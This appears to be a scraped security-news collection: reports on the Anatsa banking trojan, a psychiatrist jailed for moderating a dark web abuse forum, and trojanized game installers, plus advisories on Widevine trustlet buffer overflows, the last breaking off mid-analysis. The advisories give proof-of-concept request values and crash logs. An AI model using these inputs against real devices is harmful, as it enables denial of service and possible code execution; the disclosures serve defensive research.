A new Android malware campaign has been observed pushing the Anatsa banking trojan to target banking customers in the U.S., U.K., Germany, Austria, and Switzerland since the start of March 2023.
"The actors behind Anatsa aim to steal credentials used to authorize customers in mobile banking applications and perform Device-Takeover Fraud (DTO) to initiate fraudulent transactions," ThreatFabric

Mobile Security / Malware

A new Android malware campaign has been observed pushing the Anatsa banking trojan to target banking customers in the U.S., U.K., Germany, Austria, and Switzerland since the start of March 2023.

"The actors behind Anatsa aim to steal credentials used to authorize customers in mobile banking applications and perform Device-Takeover Fraud (DTO) to initiate fraudulent transactions," ThreatFabric said in an analysis published Monday.

The Dutch cybersecurity company said Anatsa-infected Google Play Store dropper apps have accrued over 30,000 installations to date, indicating that the official app storefront has become an effective distribution vector for the malware.

Anatsa, also known by the name TeaBot and Toddler, first emerged in early 2021, and has been observed masquerading as seemingly innocuous utility apps like PDF readers, QR code scanners, and two-factor authentication (2FA) apps on Google Play to siphon users' credentials. It has since become one of the most prolific banking malware, targeting over 400 financial institutions across the world.

The trojan features backdoor-like capabilities to steal data and also performs overlay attacks in order to steal credentials as well as log activities by abusing its permissions to Android's accessibility services API. It can further bypass existing fraud control mechanisms to carry out unauthorized fund transfers.

"Since transactions are initiated from the same device that targeted bank customers regularly use, it has been reported that it is very challenging for banking anti-fraud systems to detect it," ThreatFabric noted.

In the latest campaign observed by ThreatFabric, the dropper app, once installed, makes a request to a GitHub page that points to another GitHub URL hosting the malicious payload, which aims to trick victims by disguising themselves as app add-ons. It's suspected that users are routed to these apps through sketchy advertisements.

A notable aspect of the dropper is its use of the restricted "REQUEST\_INSTALL\_PACKAGES" permission, which has been repeatedly exploited by rogue apps distributed via the Google Play Store to install additional malware on the infected device. The names of the apps are as follows -

*   All Document Reader & Editor (com.mikijaki.documents.pdfreader.xlsx.csv.ppt.docs)
*   All Document Reader and Viewer (com.muchlensoka.pdfcreator)
*   PDF Reader - Edit & View PDF (lsstudio.pdfreader.powerfultool.allinonepdf.goodpdftools)
*   PDF Reader & Editor (com.proderstarler.pdfsignature)
*   PDF Reader & Editor (moh.filemanagerrespdf)

The list of top countries that are of interest to Anatsa based on the number of financial applications targeted include the U.S., Italy, Germany, the U.K., France, the U.A.E., Switzerland, South Korea, Australia, and Sweden. Also present in the list are Finland, Singapore, and Spain.

"The latest campaign by Anatsa reveals the evolving threat landscape that banks and financial institutions face in today's digital world," ThreatFabric said. "The recent Google Play Store distribution campaigns \[...\] demonstrate the immense potential for mobile fraud and the need for proactive measures to counter such threats."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Anatsa Banking Trojan Targeting Users in US, UK, Germany, Austria, and Switzerland

By Deeba Ahmed
Closure for victims?
This is a post from HackRead.com Read the original post: NHS Psychiatrist Jailed; Dark Web Forum and 7,000 Images Seized

**Dr. Kabir Garg was administering “The Annex,” a notorious dark web platform for child sexual abuse, which had over 30,000 registered members.**

An Indian psychiatrist who worked at South London and Maudsley NHS Trust has been sentenced to six years in prison for his involvement in a large-scale dark web child sexual abuse scandal. He was arrested by the UK’s National Crime Agency (NCA) in November 2022.

**The Annex**

According to the NCA, 33-year-old Kabir Garg from Lewisham, London moderated a dark web chat site called The Annex, which boasted 90,000 members worldwide.

He was responsible for sharing hundreds of links to indecent images of children daily on this site, maintaining decorum, and helping other visitors how to share images on the forum and evade law enforcement. Members of the site used the Tor anonymity browser to access the platform.

Kabir Garg: Image Courtesy National Crime Agency

**A Shocking Crime!**

The special prosecutor for the Crown Prosecution Service’s Organised Child Sexual Abuse Unit, Bethany Raine, claimed that it was a shocking crime, considering that Garg was an NHS psychiatrist whose primary duty was to treat vulnerable members of society. He should have understood the devastating impact of sexual abuse on children’s psyche.

**Thousands of Indecent Images Uncovered**

When the NCA searched his apartment, they recovered several devices, including a laptop and an SD card, from which they found around 7,000 indecent images. Out of these, 522 were category A images, which is the most serious category of indecent material.

In addition, they discovered medical journals and articles on the psychological impact of sexual abuse on children, with titles such as “Puberty and Adolescent Sexuality,” “Effects and Aftermath of Rape,” and “A Study on Child Abuse in India.” This indicates that Garg was well aware of the impact of his actions on children.

**Accused Pleaded Guilty**

At the hearing on January 9th, the accused pleaded guilty to one count of facilitating the exploitation of children, three counts of sharing indecent images of children, one count of possessing prohibited images of children, and three counts of making indecent images of children. Raine stated that, given the evidence recovered from his residence, Garg had no choice but to plead guilty, and such platforms should not have any place in society.

According to the Crown Prosecution Service press release, the Woolwich Crown Court sentenced Garg on June 23rd, and he was jailed on Friday. Garg will be registered as a sex offender for life and will also be subject to a Serious Harm Prevention Order.

Profile of Kabir Garg

**A Sigh of Relief**

After Garg’s sentencing, the NHS Foundation Trust released a statement hoping that it might bring a “sense of justice and closure” to the victims of his “deplorable actions.”

On the other hand, the General Medical Council has temporarily suspended Garg until the results of a full GMC investigation are received. Once the results arrive, the GMC will decide whether to refer this case to a full tribunal hearing to determine Garg’s fate as a doctor.

Thankfully, the Annex is now defunct. It was revealed that during its active period, it had 30 administrators. Garg was initially a member and became a moderator after impressing the admins with his dedication and “hard work”. He completed his MBBS from King George Medical University, Lucknow, and worked for the National Institute of Mental Health and Neurosciences before moving to the UK.

1.  Authorities seize world’s biggest dark web child abuse site
2.  100,000 Hacked ChatGPT Accounts Discovered on Dark Web
3.  Unreleased Music Stolen and Sold on Dark Web: Hacker Fined
4.  Microsoft sued for alleged misuse of stolen Dark Web credentials
5.  Google’s Latest Android Feature Drop: Dark Web Search for Gmail ID

NHS Psychiatrist Jailed; Dark Web Forum and 7,000 Images Seized

By Deeba Ahmed
Cyble Research and Intelligence Lab's cybersecurity researchers have disclosed how threat actors exploit gamers by delivering malware-loaded installers of popular games.
This is a post from HackRead.com Read the original post: Fake Super Mario 3 Installers Drop Crypto Miner, Data Stealer

**The malware has the potential to target large-scale victims since games like Super Mario 3 are famous among and adored by children around the world.**

Recently, Cyble researchers discovered a trojanized version of the Super Mario 3: Mario Forever installer. The malware hidden inside the installer can perform various malicious tasks, such as stealing sensitive data, deploying cryptocurrency miners, and launching ransomware.

**Beware of Fake Super Mario 3 Installer**

Researchers have noted that game installers have emerged as a lucrative way to maximize monetary gains. Threat actors prefer to exploit game installers for delivering malware due to their extensive user base, powerful hardware, and large file size, which allows them to easily hide malware. Gamers trust these installers, considering them legitimate software, but social engineering can allow attackers to exploit this trust and trick gamers into downloading malware.

In this case, the researchers wrote that the fake installer comes with three executable files. One of these files installs the game, while the other two files, titled java.exe and atom.exe, are installed in the AppData directory on the device. Both files are assigned different tasks.

*   Java.exe- it may look like a regular Java runtime, but in reality, it is a Monero cryptocurrency miner tasked with establishing a connection to a mining server (gulfmonerooceanstream).
*   Atom.exe- It is a self-duplicating SupremeBot mining client that creates a scheduled task for executing the copy every fifteen minutes. SupremeBot has to fetch another executable, “wime.exe,” after establishing a connection to a C2 server.

**How does it work?**

After the malicious installer file “super-mario-forever-v702e” is installed on the system, it launches an XMR miner and a SupremeBot mining program through two files. Once this is done, a connection to the C2 server is established to transmit data information, register the client, and obtain the required configuration to start cryptocurrency mining. This is followed by fetching the “wime.exe” executable, an open-source Umbral Stealer.

Malware-infected Super Mario game installer (left) – Malware files upon installation (right) – Screenshots credit: Cyble

The Umbral Stealer is capable of stealing sensitive user data from the targeted device, which includes stored cookies and passwords, session tokens, credentials from cryptocurrency wallets, and authentication tokens for other platforms or games. Additionally, it disables Windows Defender to evade detection if tamper protection is inactive. However, if tamper protection is active, it adds the process to the exclusion list.

**Potential Dangers**

The malicious Super Mario 3 installer is quite lethal as it is capable of cryptocurrency mining and data stealing. This can result in heavy financial losses for victims and drain computer resources, causing a decline in system performance.

“Malware distributed through game installers can be monetized through activities like stealing sensitive information, conducting ransomware attacks, and more,” Cyble’s report read.

1.  Alert: Android Super Mario Run is Actually Malware
2.  Minecraft declared the most malware-infected game
3.  Stop downloading fake malicious Fortnite Android apps
4.  ROBLOX, Nintendo game cracks drop ChromeLoader malware

Fake Super Mario 3 Installers Drop Crypto Miner, Data Stealer

Widevine Trusted Application (TA) 5.0.0 through 5.1.1 has a drm_save_keys file_name_len integer overflow and resultant buffer overflow.

CVE-2022-48332:

Buffer Overflow in Widevine Trustlet (drm\_save\_keys @ 0x6a18)

 

CVE:

CVE-2022-48332

Vendor:

Google

Device:

Nexus 6

Affected Component:

Widevine

Publication Date:

March 2023

Credits:

CyberIntel Team

Last edited: 11/04/23

**1\. Description**

This entry describes a vulnerability that we found in the Widevine Trusted Application (TA), which runs within Qualcomm’s Secure Execution Environment (QSEE). The vulnerability is an integer overflow that leads to a subsequent buffer overflow. This bug has been found using tools we have developed to assist in the security evaluation of TrustZone, including a debugger and a coverage-based fuzzer for QSEE TAs. Please, refer to this page for further information.

Qualcomm Secure Execution Environment is one of the most widespread commercial TEE solutions in the smartphone space, used by many different devices such as Xiaomi, Motorola and several devices of the Google Nexus and Pixel series.

Widevine is a Digital Rights Management (DRM) technology developed by Google to protect copyrighted content and to enable secure distribution and consumption of video and audio content. The technology involves encryption, licensing, and key management to ensure that content can only be decrypted and played back on authorized devices.

An attacker could potentially exploit the vulnerability in the Trusted Application by sending a command from the Normal World, causing the application to crash and possibly execute arbitrary code. This vulnerability could have potential consequences, such as elevating attacker’s privileges and exposing sensitive information.

This post is part of a series of related bugs affecting Widevine Trusted Application of Google Nexus 6:

> *   CVE-2022-48331
>     
> *   CVE-2022-48332
>     
> *   CVE-2022-48333
>     
> *   CVE-2022-48334
>     
> *   CVE-2022-48335
>     
> *   CVE-2022-48336
>     
> *   CVE-2015-6639
>     
> *   CVE-2015-6647
>     

**2\. Affected Versions**

Affected versions are: 5.0.0 (LRX21O), 5.0.1 (LRX22C), 5.1.0 (LMY47D), 5.1.0 (LMY47E), 5.1.0 (LMY47I), 5.1.0 (LMY47M), 5.1.1 (LMY47Z), 5.1.1 (LMY48I), 5.1.1 (LMY48M), 5.1.1 (LMY48T), 5.1.1 (LMY48W), 5.1.1 (LMY48X), 5.1.1 (LMY48Y), 5.1.1 (LVY48C), 5.1.1 (LVY48E), 5.1.1 (LVY48F), 5.1.1 (LVY48H), 5.1.1 (LVY48I), 5.1.1 (LYZ28E), 5.1.1 (LYZ28J), 5.1.1 (LYZ28K), 5.1.1 (LYZ28M) and 5.1.1 (LYZ28N).

**3\. Impact**

This vulnerability has the potential to compromise the security of the system in multiple ways.

An attacker with high priviledges in Normal World can exploit the vulnerability to compromise the Trusted Application running in the Secure World, eventually executing arbitrary code and reading and/or modifying information of critical files, compromising the confidentiality and integrity of the system.

On the other hand, the attacker is able to crash the Trusted Application, potentially resulting in a denial of service.

**4\. Vulnerability**

The bug is present in Widevine’s drm_save_keys() command. This command closely resembles drm_verify_keys(), which has been featured in other blog entries (refer to CVE-2022-48333 and CVE-2022-48334).

The following snippet shows a switch-case present in the TA’s command handler:

switch(\*req\_buf) {
case 0x50001: // drm\_save\_keys() command
    if ((0x2a10 < req\_buf\_size) && (0x107 < resp\_buf\_size)) {
        ...
        drm\_save\_keys(
            req\_buf + 4,    req\_buf\[1\], // feature\_name
            req\_buf + 0x44, req\_buf\[2\], // file\_name
            req\_buf + 0x84, req\_buf\[3\], // msg
            resp\_buf + 4                // prt\_path (result)
        );
    }
    break;
}

It takes the Command ID from the first word of the Request Buffer, which is sent by client applications in the Normal World. Thus, if the received command is 0x50001, it jumps to the drm_save_keys() function.

The structure of the Request Buffer for this command is the following:

struct widevine\_drm\_save\_keys\_cmd {
    uint32\_t cmd\_id;
    uint32\_t feature\_name\_len;
    uint32\_t file\_name\_len;
    uint32\_t msg\_len;
    char feature\_name\[0x100\];
    char file\_name\[0x100\];
    char msg\_data\[0x100\];
};

It contains three buffers (_i.e._, feature_name, file_name and msg_data) and three integers indicating the effective length of each buffer. It is important to note that even though the maximum size of each buffer is 256 bytes, the client has control over the values of feature_name_len, file_name_len and msg_len, since they are directly taken from the Request Buffer.

The main functionality of drm_save_keys() is securely storing encryption keys or DRM-related data. It performs the following high-level tasks:

> *   Validate input parameters and check for any constraints that may prevent key storage.
>     
> *   Construct a file path using the provided feature name and file name.
>     
> *   Write the message data, which may contain encryption keys or DRM-related information, to a Secure File System (SFS).
>     
> *   Compute and store a CRC value for the written data to ensure data integrity and error detection.
>     

The bug is present in the validation of input parameters while constructing the SFS file path:

heap\_buf \= malloc(0x100);
...
memzero(heap\_buf, 0x80);
prefix\_len \= strncpy(heap\_buf, &persist\_prefix, 0x80);
total\_len \= prefix\_len + feature\_name\_len;
// ---- CVE-2022-48331 ---- //
if (total\_len < 0x100) {
    prefix\_len \= strlen(&persist\_prefix);
    memcpy(heap\_buf + prefix\_len, feature\_name, feature\_name\_len);
    // ----------------------- //
    \*(heap\_buf + total\_len) \= '/';
    if (total\_len + feature\_name\_len < 0xff) {
        memcpy(heap\_buf + total\_len + 1, feature\_name, feature\_name\_len);
        total\_len += (feature\_name\_len + 1);        \*(heap\_buf + total\_len) \= '/';
        // ---- CVE-2022-48332 ---- //
        if (total\_len + file\_name\_len < 0xff) {            memcpy(heap\_buf + total\_len + 1, file\_name, file\_name\_len);            ...
}

In this code snippet, a heap buffer is allocated and the persist_prefix string is copied into it using the strncpy() function. This string is initialized with the value "/persist/data/" by default, so that it’s length is 14. The buffer is then filled with the provided feature name, ensuring the total length does not exceed the specified limit. This is done using total_len by adding the length of the persist_prefix string and feature_name_len, which is directly specified by the client through the Request Buffer.

The first part corresponds to CVE-2022-48331, where the check if (total_len < 0x100) is performed using a signed integer and can cause a buffer overflow if feature_name_len takes any value from -14 (0xfffffff2) to -1 (0xffffffff).

To pass this first check without triggering the first bug, the value of feature_name_len must be within the inclusive range of 1 to 241. Then, the code appends the feature_name string two times to the temporary heap buffer. In the previous code snippet, there is a second check on feature_name_len that constraints its value to \[1, 120\]. Finally, there is a third if that checks the value of file_name_len. At this point, the result of the addition is treated as a signed integer, which leads to an incorrect check. Consequently, this third check is bypassed when the values for file_name_len are sufficiently large:

req.feature\_name\_len \= 120; // valid values are: \[1, 120\]
req.file\_name\_len \= \-(14 + (2 \* req.feature\_name\_len) + 1);

The code after the check calls the memcpy() function to copy the contents of the file_name string into the heap buffer, using the improperly checked file_name_len. Since this value can be large enough, it can cause a buffer overflow in this copy operation:

The user has full control over the **value** of file_name_len and the **contents** of the file_name buffer in the Request Buffer.

Since there are several specific and large file_name_len values that can cause the buffer to overflow, a memory copy operation with any of these values will exceed the bounds of the data segment, resulting in an invalid memory access and potentially causing the application to crash.

**5\. Exploitation**

This section shows a Proof of Concept (PoC) of how to trigger the vulnerability by sending a command to the Widevine trusted application running in the Secure World. Based on the command structure we have derived by reverse engineering, we can craft the command request to be sent to the trusted application:

req\->cmd\_id \= 0x50001;  // drm\_save\_keys;
req\->feature\_name\_len \= 1;
req\->file\_name\_len \= 0xffffffff;
req\->msg\_len \= 1;
...

The Commmand ID 0x50001 is specified to invoke drm_save_keys(), and file_name_len is set to 0xffffffff so that the sum of total_len + file_name_len overflows producing a small value, bypassing the check and eventually calling memcpy() producing the buffer overflow. When this request is sent to Widevine, it ends up crashing.

<5>widevine: "drm\_save\_keys: feature\_name 0xfff00010, feature\_name\_len 1, file\_name 0xfff00110,  file\_name\_len 4294967295, msg\_data 0xfff00210
\*\*\* crash \*\*\*

The Android log in normal world reports that qseecom_send_cmd has failed with error -22, which means APP\_FAULTED:

<4>QSEECOM: qseecom\_load\_app: App (widevine) does'nt exist, loading apps for first time
<4>QSEECOM: qseecom\_load\_app: App with id 3 (widevine) now loaded
<3>QSEECOM: \_\_qseecom\_send\_cmd: Response result -1 not supported
<3>QSEECOM: qseecom\_ioctl: failed qseecom\_send\_cmd: -22
<4>QSEECOM: qseecom\_unload\_app: App id 3 now unloaded

The reason it crashes is because the large memory copy ends up writing to unmapped memory due to exceeding the data segment.

CVE-2022-48332: Cyber Intelligence - Hardware and Software Security Assessments

Widevine Trusted Application (TA) 5.0.0 through 5.1.1 has a drm_verify_keys prefix_len+feature_name_len integer overflow and resultant buffer overflow.

CVE-2022-48333:

Buffer Overflow in Widevine Trustlet (drm\_verify\_keys @ 0x730c)

 

CVE:

CVE-2022-48333

Vendor:

Google

Device:

Nexus 6

Affected Component:

Widevine

Publication Date:

March 2023

Credits:

CyberIntel Team

Last edited: 11/04/23

**1\. Description**

This entry describes a vulnerability that we found in the Widevine Trusted Application (TA), which runs within Qualcomm’s Secure Execution Environment (QSEE). The vulnerability is an integer overflow that leads to a subsequent buffer overflow. This bug has been found using tools we have developed to assist in the security evaluation of TrustZone, including a debugger and a coverage-based fuzzer for QSEE TAs. Please, refer to this page for further information.

Qualcomm Secure Execution Environment is one of the most widespread commercial TEE solutions in the smartphone space, used by many different devices such as Xiaomi, Motorola and several devices of the Google Nexus and Pixel series.

Widevine is a Digital Rights Management (DRM) technology developed by Google to protect copyrighted content and to enable secure distribution and consumption of video and audio content. The technology involves encryption, licensing, and key management to ensure that content can only be decrypted and played back on authorized devices.

An attacker could potentially exploit the vulnerability in the Trusted Application by sending a command from the Normal World, causing the application to crash and possibly execute arbitrary code. This vulnerability could have potential consequences, such as elevating attacker’s privileges and exposing sensitive information.

This post is part of a series of related bugs affecting Widevine Trusted Application of Google Nexus 6:

> *   CVE-2022-48331
>     
> *   CVE-2022-48332
>     
> *   CVE-2022-48333
>     
> *   CVE-2022-48334
>     
> *   CVE-2022-48335
>     
> *   CVE-2022-48336
>     
> *   CVE-2015-6639
>     
> *   CVE-2015-6647
>     

**2\. Affected Versions**

Affected versions are: 5.0.0 (LRX21O), 5.0.1 (LRX22C), 5.1.0 (LMY47D), 5.1.0 (LMY47E), 5.1.0 (LMY47I), 5.1.0 (LMY47M), 5.1.1 (LMY47Z), 5.1.1 (LMY48I), 5.1.1 (LMY48M), 5.1.1 (LMY48T), 5.1.1 (LMY48W), 5.1.1 (LMY48X), 5.1.1 (LMY48Y), 5.1.1 (LVY48C), 5.1.1 (LVY48E), 5.1.1 (LVY48F), 5.1.1 (LVY48H), 5.1.1 (LVY48I), 5.1.1 (LYZ28E), 5.1.1 (LYZ28J), 5.1.1 (LYZ28K), 5.1.1 (LYZ28M) and 5.1.1 (LYZ28N).

**3\. Impact**

This vulnerability has the potential to compromise the security of the system in multiple ways.

An attacker with high priviledges in Normal World can exploit the vulnerability to compromise the Trusted Application running in the Secure World, eventually executing arbitrary code and reading and/or modifying information of critical files, compromising the confidentiality and integrity of the system.

On the other hand, the attacker is able to crash the Trusted Application, potentially resulting in a denial of service.

**4\. Vulnerability**

The bug is present in Widevine’s drm_verify_keys() command. This command closely resembles drm_save_keys(), which has been featured in other blog entries (refer to CVE-2022-48331 and CVE-2022-48332).

The following snippet shows a switch-case present in the TA’s command handler:

switch(\*req\_buf) {
case 0x50002: // drm\_verify\_keys() command
    if ((0x2a0f < req\_buf\_size) && (0x107 < resp\_buf\_size)) {
        drm\_verify\_keys(
            req\_buf + 4,    req\_buf\[1\], // feature\_name
            req\_buf + 0x44, req\_buf\[2\]  // file\_name
        );
        ...
    }
    break;
}

It takes the Command ID from the first word of the Request Buffer, which is sent by client applications in the Normal World. Thus, if the received command is 0x50002, it jumps to the drm_verify_keys() function.

The structure of the Request Buffer for this command is the following:

struct widevine\_drm\_save\_keys\_cmd {
    uint32\_t cmd\_id;
    uint32\_t feature\_name\_len;
    uint32\_t file\_name\_len;
    char feature\_name\[0x100\];
    char file\_name\[0x100\];
};

It contains two buffers (_i.e._, feature_name and file_name) and two integers indicating the effective length of each buffer. It is important to note that even though the maximum size of each buffer is 256 bytes, the client has control over the values of feature_name_len and file_name_len, since they are directly taken from the Request Buffer.

The main functionality of drm_verify_keys() is to verify the integrity of encryption keys or DRM-related data stored within the Widevine DRM system. It performs the following high-level tasks:

> *   Validate input parameters and check for any constraints that may prevent the verification process.
>     
> *   Construct a full file path using the provided feature name and file name.
>     
> *   Set the CRC (cyclic redundancy check) file path, which is used for verifying the integrity of the keys.
>     
> *   Verify the stored encryption keys or DRM-related data and check for any tampering or corruption.
>     

The bug is present in the validation of input parameters while constructing the SFS file path:

heap\_buf \= malloc(0x100);
...
memzero(heap\_buf, 0x80);
prefix\_len \= strncpy(heap\_buf, &persist\_prefix, 0x80);
total\_len \= prefix\_len + feature\_name\_len; // Signed int
if (total\_len < 0x100) {
    prefix\_len \= strlen(&persist\_prefix);
    memcpy(heap\_buf + prefix\_len, feature\_name, feature\_name\_len);    ...
}

In this code snippet, a heap buffer is allocated and the persist_prefix string is copied into it using the strncpy() function. This string is initialized with the value "/persist/data/" by default, so that it’s length is 14. The buffer is then filled with the provided feature name, ensuring the total length does not exceed the specified limit. This is done using total_len by adding the length of the persist_prefix string and feature_name_len, which is directly specified by the client through the Request Buffer.

The bug is present in this calculation. Since total_len is a signed integer, this calculation causes an integer overflow if the sum of prefix_len and feature_name_len is large enough, resulting in a negative value for total_len. As a result, the subsequent if statement passes even if the actual total length of the string is greater than the allocated buffer size.

Since the check is if (total_len < 0x100), for the condition 14 + feature_name_len < 0x100 to be triggered, the value of feature_name_len must be within the inclusive range of -14 to 241.

The code after the check calculates again the prefix_len and calls the memcpy() function to copy the contents of the feature_name string into the buffer, immediately following the persist_prefix, using feature_name_len. Since this value can be large enough, it can cause a buffer overflow in this copy operation:

The range of values for feature_name_len that can cause a buffer overflow extends from -14 (0xfffffff2) to -1 (0xffffffff).

The user has full control over the **value** of feature_name_len and the **contents** of the feature_name buffer in the Request Buffer.

Since there are 14 specific and large feature_name_len values that can cause the buffer to overflow, a memory copy operation with any of these values will exceed the bounds of the data segment, resulting in an invalid memory access and potentially causing the application to crash.

**5\. Exploitation**

This section shows a Proof of Concept (PoC) of how to trigger the vulnerability by sending a command to the Widevine trusted application running in the Secure World. Based on the command structure we have derived by reverse engineering, we can craft the command request to be sent to the trusted application:

req\->cmd\_id \= 0x50002;  // drm\_verify\_keys
req\->feature\_name\_len \= 0xffffffff;
req\->file\_name\_len \= 1;
...

The Commmand ID 0x50002 is specified to invoke drm_verify_keys(), and feature_name_len is set to 0xffffffff so that the sum of prefix_len + feature_name_len overflows producing a small value, bypassing the check and eventually calling memcpy() producing the buffer overflow. When this request is sent to Widevine, it ends up crashing.

<5>widevine: "drm\_verify\_keys: feature\_name 0xfff00010, feature\_name\_len 4294967295, file\_name 0xfff00110,  file\_name\_len 1"
\*\*\* crash \*\*\*

The Android log in normal world reports that qseecom_send_cmd has failed with error -22, which means APP\_FAULTED:

<4>QSEECOM: qseecom\_load\_app: App (widevine) does'nt exist, loading apps for first time
<4>QSEECOM: qseecom\_load\_app: App with id 3 (widevine) now loaded
<3>QSEECOM: \_\_qseecom\_send\_cmd: Response result -1 not supported
<3>QSEECOM: qseecom\_ioctl: failed qseecom\_send\_cmd: -22
<4>QSEECOM: qseecom\_unload\_app: App id 3 now unloaded

The reason it crashes is because the large memory copy ends up writing to unmapped memory due to exceeding the data segment.

CVE-2022-48333: Cyber Intelligence - Hardware and Software Security Assessments

Widevine Trusted Application (TA) 5.0.0 through 7.1.1 has a PRDiagParseAndStoreData integer overflow and resultant buffer overflow.

CVE-2022-48336:

Buffer Overflow in Widevine Trustlet (PRDiagParseAndStoreData @ 0x5cc8)

 

CVE:

CVE-2022-48336

Vendor:

Google

Device:

Nexus 6

Affected Component:

Widevine

Publication Date:

March 2023

Credits:

CyberIntel Team

Last edited: 11/04/23

**1\. Description**

This entry describes a vulnerability that we found in the Widevine Trusted Application (TA), which runs within Qualcomm’s Secure Execution Environment (QSEE). The vulnerability is an integer overflow that leads to a subsequent buffer overflow. This bug has been found using tools we have developed to assist in the security evaluation of TrustZone, including a debugger and a coverage-based fuzzer for QSEE TAs. Please, refer to this page for further information.

Qualcomm Secure Execution Environment is one of the most widespread commercial TEE solutions in the smartphone space, used by many different devices such as Xiaomi, Motorola and several devices of the Google Nexus and Pixel series.

Widevine is a Digital Rights Management (DRM) technology developed by Google to protect copyrighted content and to enable secure distribution and consumption of video and audio content. The technology involves encryption, licensing, and key management to ensure that content can only be decrypted and played back on authorized devices.

An attacker could potentially exploit the vulnerability in the Trusted Application by sending a command from the Normal World, causing the application to crash and possibly execute arbitrary code. This vulnerability could have potential consequences, such as elevating attacker’s privileges and exposing sensitive information.

This post is part of a series of related bugs affecting Widevine Trusted Application of Google Nexus 6:

> *   CVE-2022-48331
>     
> *   CVE-2022-48332
>     
> *   CVE-2022-48333
>     
> *   CVE-2022-48334
>     
> *   CVE-2022-48335
>     
> *   CVE-2022-48336
>     
> *   CVE-2015-6639
>     
> *   CVE-2015-6647
>     

**2\. Affected Versions**

Affected versions are: 5.0.0 (LRX21O), 5.0.1 (LRX22C), 5.1.0 (LMY47D), 5.1.0 (LMY47E), 5.1.0 (LMY47I), 5.1.0 (LMY47M), 5.1.1 (LMY47Z), 5.1.1 (LMY48I), 5.1.1 (LMY48M), 5.1.1 (LMY48T), 5.1.1 (LMY48W), 5.1.1 (LMY48X), 5.1.1 (LMY48Y), 5.1.1 (LVY48C), 5.1.1 (LVY48E), 5.1.1 (LVY48F), 5.1.1 (LVY48H), 5.1.1 (LVY48I), 5.1.1 (LYZ28E), 5.1.1 (LYZ28J), 5.1.1 (LYZ28K), 5.1.1 (LYZ28M), 5.1.1 (LYZ28N), 6.0.0 (MRA58K), 6.0.0 (MRA58N), 6.0.0 (MRA58R), 6.0.0 (MRA58X), 7.0.0 (NBD90Z), 7.0.0 (NBD91P), 7.0.0 (NBD91U), 7.0.0 (NBD91X), 7.0.0 (NBD91Y), 7.0.0 (NBD91Z), 7.0.0 (NBD92F), 7.0.0 (NBD92G), 7.1.1 (N6F26Q), 7.1.1 (N6F26R), 7.1.1 (N6F26U), 7.1.1 (N6F27C), 7.1.1 (N6F27E).

**3\. Impact**

This vulnerability has the potential to compromise the security of the system in multiple ways.

An attacker with high priviledges in Normal World can exploit the vulnerability to compromise the Trusted Application running in the Secure World, eventually executing arbitrary code and reading and/or modifying information of critical files, compromising the confidentiality and integrity of the system.

On the other hand, the attacker is able to crash the Trusted Application, potentially resulting in a denial of service.

**4\. Vulnerability**

The bug is present in Widevine’s PRDiagProvisionDataHandler() command.

The following snippet shows a switch-case present in the TA’s command handler:

switch(\*req\_buf) {
case 0x50004: // PRDiagProvisionDataHandler
    if ((0x2807 < req\_buf\_size) && (0x107 < resp\_buf\_size)) {
        ret \= PRDiagProvisionDataHandler(req\_buf + 2, req\_buf\[1\]);
        ...
    }
    break;
}

It takes the Command ID from the first word of the Request Buffer, which is sent by client applications in the Normal World. Thus, if the received command is 0x50004, it jumps to the PRDiagProvisionDataHandler() function.

The structure of the Request Buffer for the PRDiagProvisionDataHandler() function is similar to the one used in PRDiagMaintenanceHandler (refer to CVE-2022-48335):

struct widevine\_PRDiagProvisionDataHandler\_cmd {
        uint32\_t cmd\_id;
        uint32\_t payload\_size;
        struct widevine\_PRDiagProvisionDataHandler\_payload payload;
};

It contains an embedded structure and an integer indicating its size. The embedded structure is defined in the following code-block:

// Internal payload/request buffer for PRDiagProvisionDataHandler command
struct PRDiagProvisionDataHandler\_payload {
        enum {
                op\_PRDiagParseAndStoreData      \= 0,
                PRDiagPDH\_FORCE\_ENUM\_32\_BITS \= (INT\_MAX | ~INT\_MAX),
        } op;
        uint32\_t compare\_flag;
        uint32\_t msg\_buf\_size;
        uint32\_t data\_len;
        // NOTE: The widevine trustlet checks the size of the request buffer
        // containing the widevine\_PRDiagMaintenanceHandler\_cmd structure.
        // The entire request buffer must have at least 0x2808 bytes
        char msg\_buf\[\];
};

The PRDiagProvisionDataHandler function firstly determines if keys can be provisioned and then simply copies the payload/request into a temporary heap buffer and passes it to the PRDiagParseAndStoreData() function:

int PRDiagProvisionDataHandler(void \*payload, uint32\_t payload\_size) {
     struct widevine\_PRDiagProvisionDataHandler\_payload \*req;

     ...
     // Check if keys can be provisioned
     ...

     if (!payload || !payload\_size) return 0x10;

     req \= malloc(payload\_size);
     if (!req) return 0xf;

     memcpy(req, payload, payload\_size);
     if (req\->op \== 0) {
         PRDiagParseAndStoreData(req);
     }
     ...

The bug is inside the PRDiagParseAndStoreData function. The main functionality of this function is to store provisioning data into the Secure File System (SFS). The following code snippet shows a simplified version of the PRDiagParseAndStoreData function:

int PRDiagParseAndStoreData(struct PRDiagProvisionDataHandler\_payload \*req) {
    // Check input and operation
    if (!req || req\->op != 0) return 0x10;

    msg\_buf\_size \= req\->msg\_buf\_size;
    msg\_buf \= &req\->msg\_buf;

    if (!req\->data\_len) {
        // CVE-2015-6639
        ...
    }
    else {
        // data\_len is not zero
        // filePathBuffer @ 0x2e0fc
        // fullFilePathBuffer @ 0x2e5fc
        memzero(&fullFilePathBuffer, 0x80);
        pcVar2 \= strncpy(&fullFilePathBuffer, &persist\_prefix, 0x80);
        sVar3 \= strlen(&filePathBuffer);
        sVar4 \= strlen(&persist\_prefix);
        memcpy(&fullFilePathBuffer + sVar4, &filePathBuffer, sVar3);
        sVar3 \= strlen(&filePathBuffer);
        pcVar2\[&fullFilePathBuffer + sVar3\] \= '/';
        sVar4 \= strlen(&filePathBuffer);
        memcpy(&filePathBuffer + 1 + pcVar2 + sVar3, &filePathBuffer, sVar4);
        iVar5 \= PRDiagPruneTrailingSlashes(&fullFilePathBuffer);
        if (msg\_buf\_size + iVar5 < 0x80) {            if (iVar5 \>= 1) {
                (&fullFilePathBuffer)\[iVar5\] \= '/';
                memcpy(&fullFilePathBuffer + 1 + iVar5, msg\_buf, msg\_buf\_size);                ...

The function first performs some validations on the input and the operation being requested and then checks the data_len value. If this value is not zero, it constructs a file path by concatenating two strings: persist_prefix and filePathBuffer, which are global buffers stored in the data segment. The resulting SFS file path is stored in the fullFilePathBuffer variable, which is used later in the function to write the provisioning data.

